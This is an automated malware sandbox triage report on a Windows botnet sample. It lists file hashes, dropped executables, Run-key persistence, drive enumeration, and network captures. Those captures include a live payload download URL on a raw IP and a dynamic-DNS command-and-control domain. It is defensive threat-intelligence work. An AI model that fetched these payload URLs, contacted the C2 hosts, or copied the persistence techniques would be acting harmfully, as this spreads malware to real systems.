chinese_generic_botnet | 29b67786d8b98779be782b7212ab9feb95d6e41dbbdacbf00cb26cebc4011ae2 | Triage

Analysis

max time kernel
161s
max time network
178s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
16/01/2023, 08:32 UTC

Sharing

Report Analysis Logs

General

Target

1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
Size

362KB
MD5

99be0e637186d469b647525e9275ccfc
SHA1

83a797037fd4c10f1248387395cc039aa9f3c71b
SHA256

1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180
SHA512

1477f8db399c74174379ff881f6dcd9148bf57ff29839c466259d4c17235254e66cfd0410e5d0d79304a1a4f8352910d64a4f1446f7ed9cd5ceccd285ed265d5
SSDEEP

3072:N8jSZi34eTzl5KV2GenT0cTtm2LAQSXVqjzpYfJhrI:quZ5eg2GenQ67wk3pyJhrI

Score

10^/10

chinese_generic_botnet botnet persistence

Malware Config

Signatures

Generic Chinese Botnet
A botnet originating from China which is currently unnamed publicly.
botnet chinese_generic_botnet

Chinese Botnet payload 2 IoCs

resource	yara_rule
behavioral2/memory/4844-136-0x0000000010000000-0x0000000010018000-memory.dmp	unk_chinese_botnet
behavioral2/memory/1532-145-0x0000000010000000-0x0000000010018000-memory.dmp	unk_chinese_botnet

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
5008	computer.exe
1532	._cache_computer.exe
3208	Synaptics.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	computer.exe

Adds Run key to start application 2 TTPs 3 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	computer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe"	1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Imsossm.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\._cache_computer.exe"	._cache_computer.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\T:	._cache_computer.exe
File opened (read-only)	\??\W:	._cache_computer.exe
File opened (read-only)	\??\Z:	._cache_computer.exe
File opened (read-only)	\??\F:	._cache_computer.exe
File opened (read-only)	\??\J:	._cache_computer.exe
File opened (read-only)	\??\M:	._cache_computer.exe
File opened (read-only)	\??\S:	._cache_computer.exe
File opened (read-only)	\??\B:	._cache_computer.exe
File opened (read-only)	\??\P:	._cache_computer.exe
File opened (read-only)	\??\Q:	._cache_computer.exe
File opened (read-only)	\??\R:	._cache_computer.exe
File opened (read-only)	\??\H:	._cache_computer.exe
File opened (read-only)	\??\Y:	._cache_computer.exe
File opened (read-only)	\??\L:	._cache_computer.exe
File opened (read-only)	\??\N:	._cache_computer.exe
File opened (read-only)	\??\O:	._cache_computer.exe
File opened (read-only)	\??\U:	._cache_computer.exe
File opened (read-only)	\??\E:	._cache_computer.exe
File opened (read-only)	\??\G:	._cache_computer.exe
File opened (read-only)	\??\I:	._cache_computer.exe
File opened (read-only)	\??\K:	._cache_computer.exe
File opened (read-only)	\??\V:	._cache_computer.exe
File opened (read-only)	\??\X:	._cache_computer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	._cache_computer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	._cache_computer.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	computer.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1532	._cache_computer.exe
1532	._cache_computer.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 4844 wrote to memory of 4644	4844	1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe	79
PID 4844 wrote to memory of 4644	4844	1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe	79
PID 4844 wrote to memory of 4644	4844	1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe	79
PID 4844 wrote to memory of 5008	4844	1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe	83
PID 4844 wrote to memory of 5008	4844	1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe	83
PID 4844 wrote to memory of 5008	4844	1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe	83
PID 5008 wrote to memory of 1532	5008	computer.exe	84
PID 5008 wrote to memory of 1532	5008	computer.exe	84
PID 5008 wrote to memory of 1532	5008	computer.exe	84
PID 5008 wrote to memory of 3208	5008	computer.exe	85
PID 5008 wrote to memory of 3208	5008	computer.exe	85
PID 5008 wrote to memory of 3208	5008	computer.exe	85

C:\Users\Admin\AppData\Local\Temp\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe
"C:\Users\Admin\AppData\Local\Temp\1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c md C:\windowss64
  2⤵
  PID:4644
- C:\windowss64\computer.exe
  "C:\windowss64\computer.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Adds Run key to start application
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:5008
- - C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Enumerates connected drives
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1532
- - C:\ProgramData\Synaptics\Synaptics.exe
    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    PID:3208

Network

GET

http://47.93.60.63:8000/exploror.exe

1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe

Remote address:

47.93.60.63:8000

Request

GET /exploror.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 47.93.60.63:8000
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Content-Length: 1181696
Accept-Ranges: bytes
Server: HFS 2.3i
Set-Cookie: HFS_SID_=0.888800468761474; path=/; HttpOnly
Last-Modified: Thu, 03 Nov 2022 07:49:44 GMT
Content-Disposition: attachment; filename="exploror.exe";
DNS

164.2.77.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

164.2.77.40.in-addr.arpa

IN PTR

Response
DNS

xred.mooo.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

xred.mooo.com

IN A

Response
DNS

freedns.afraid.org

Synaptics.exe

Remote address:

8.8.8.8:53

Request

freedns.afraid.org

IN A

Response

freedns.afraid.org

IN A

69.42.215.252
GET

http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Synaptics.exe

Remote address:

69.42.215.252:80

Request

GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 16 Jan 2023 08:34:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS
DNS

xred.mooo.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

xred.mooo.com

IN A

Response
DNS

docs.google.com

Synaptics.exe

Remote address:

8.8.8.8:53

Request

docs.google.com

IN A

Response

docs.google.com

IN A

142.250.179.174
GET

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.179.174:443

Request

GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 16 Jan 2023 08:35:56 GMT
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-Yj0LQAF4eiOfGvfClVnOlw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

Synaptics.exe

Remote address:

142.250.179.174:443

Request

GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 16 Jan 2023 08:35:56 GMT
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-lHhuxh-tbU6C648SFvIIlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked

93.184.220.29:80

46 B
40 B
1
1
93.184.220.29:80

40 B
1
93.184.220.29:80

46 B
40 B
1
1
20.23.71.251:443

tls

138 B
183 B
3
3
20.23.71.251:443

tls

138 B
183 B
3
3
47.93.60.63:8000

http://47.93.60.63:8000/exploror.exe

http

1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe

72.9kB
1.2MB
1521
1517

HTTP Request

GET http://47.93.60.63:8000/exploror.exe

HTTP Response

200
93.184.220.29:80

322 B
7
93.184.221.240:80

322 B
7
20.189.173.13:443

322 B
7
87.248.202.1:80

322 B
7
87.248.202.1:80

322 B
7
87.248.202.1:80

322 B
7
93.184.220.29:80

260 B
5
106.52.15.123:80

1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe

260 B
5
106.52.15.123:80

._cache_computer.exe

260 B
5
69.42.215.252:80

http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

http

Synaptics.exe

430 B
455 B
6
5

HTTP Request

GET http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

HTTP Response

200
193.218.201.186:8000

1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe

260 B
5
47.93.60.63:80

._cache_computer.exe

260 B
5
193.218.201.186:8000

1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe

260 B
5
47.93.60.63:80

http

._cache_computer.exe

920 B
256 B
7
6
193.218.201.186:8000

1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe

260 B
5
142.250.179.174:443

docs.google.com

Synaptics.exe

260 B
5
193.218.201.186:8000

1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe

260 B
5
142.250.179.174:443

docs.google.com

tls

Synaptics.exe

412 B
172 B
5
4
142.250.179.174:443

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

tls, http

Synaptics.exe

1.5kB
13.8kB
20
18

HTTP Request

GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

404

HTTP Request

GET https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

HTTP Response

404
193.218.201.186:8000

1d0e642944902e1e597158a6029e56ccc7fd2877ec27aec420ff81b20c1fd180.exe

208 B
4

8.8.8.8:53

164.2.77.40.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

164.2.77.40.in-addr.arpa
8.8.8.8:53

xred.mooo.com

dns

Synaptics.exe

59 B
118 B
1
1

DNS Request

xred.mooo.com
8.8.8.8:53

freedns.afraid.org

dns

Synaptics.exe

64 B
80 B
1
1

DNS Request

freedns.afraid.org

DNS Response

69.42.215.252
224.0.0.251:5353

114 B
2
8.8.8.8:53

xred.mooo.com

dns

Synaptics.exe

59 B
118 B
1
1

DNS Request

xred.mooo.com
8.8.8.8:53

docs.google.com

dns

Synaptics.exe

61 B
77 B
1
1

DNS Request

docs.google.com

DNS Response

142.250.179.174

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

Privilege Escalation

Defense Evasion

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Synaptics\Synaptics.exe

Filesize
754KB

MD5
310a7ff41f6633132e6c2bc25e51e567

SHA1
5f687df8cc3185ed68d77d0e05502c2eb308c5c8

SHA256
d1425edf482717cb64db2a36357866045b0c6306d919296591ffc9bc45d680ab

SHA512
ee9b3114cb37e52793bccdf20a27158f5def67ed9c7d8eb772e1deaf5d5f9a0030e847dea40bb320637f29508f1be2a49c3095460a6fd3afbc3bca196f642980

Download Submit
C:\ProgramData\Synaptics\Synaptics.exe

Filesize
754KB

MD5
310a7ff41f6633132e6c2bc25e51e567

SHA1
5f687df8cc3185ed68d77d0e05502c2eb308c5c8

SHA256
d1425edf482717cb64db2a36357866045b0c6306d919296591ffc9bc45d680ab

SHA512
ee9b3114cb37e52793bccdf20a27158f5def67ed9c7d8eb772e1deaf5d5f9a0030e847dea40bb320637f29508f1be2a49c3095460a6fd3afbc3bca196f642980

Download Submit
C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe

Filesize
400KB

MD5
20beeb0a82adcce3a58372804acc46be

SHA1
c579d9017d2c8298fe075ff5c05963901330e72a

SHA256
d1aaa7e7d31bf648c57f0c721d6f6ee2b17395b4e09d9d89a4f6dbd5dd706a8e

SHA512
7636912ba6323063cefb7fac5a6cff9e44a474e452a4d5d4f77ef88968266de184c68112e3667585e02e811781f51ee020e61ce820e3f9a38dcfdf30e6d522bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\._cache_computer.exe

Filesize
400KB

MD5
20beeb0a82adcce3a58372804acc46be

SHA1
c579d9017d2c8298fe075ff5c05963901330e72a

SHA256
d1aaa7e7d31bf648c57f0c721d6f6ee2b17395b4e09d9d89a4f6dbd5dd706a8e

SHA512
7636912ba6323063cefb7fac5a6cff9e44a474e452a4d5d4f77ef88968266de184c68112e3667585e02e811781f51ee020e61ce820e3f9a38dcfdf30e6d522bd

Download Submit
C:\windowss64\computer.exe

Filesize
1.1MB

MD5
be689578752179e22bf915dbcf4f7520

SHA1
e798e703bfb90707a2872b51da73f32af566aedb

SHA256
de8c1aa37dd523e0699a10be71185f7a8ac1cde972d04107068f49250ef7317e

SHA512
89c95b387e566dfaf3f6a4ab60ee6e24d2574dd3802458e4d8f15e4c44136ac54c5b3a53addc1d28748656320050ee735fa2e8e5c57cdfb53fbdddc6eb586da8

Download Submit
C:\windowss64\computer.exe

Filesize
1.1MB

MD5
be689578752179e22bf915dbcf4f7520

SHA1
e798e703bfb90707a2872b51da73f32af566aedb

SHA256
de8c1aa37dd523e0699a10be71185f7a8ac1cde972d04107068f49250ef7317e

SHA512
89c95b387e566dfaf3f6a4ab60ee6e24d2574dd3802458e4d8f15e4c44136ac54c5b3a53addc1d28748656320050ee735fa2e8e5c57cdfb53fbdddc6eb586da8

Download Submit
memory/1532-145-0x0000000010000000-0x0000000010018000-memory.dmp

Filesize
96KB

Download
memory/4844-136-0x0000000010000000-0x0000000010018000-memory.dmp

Filesize
96KB

Download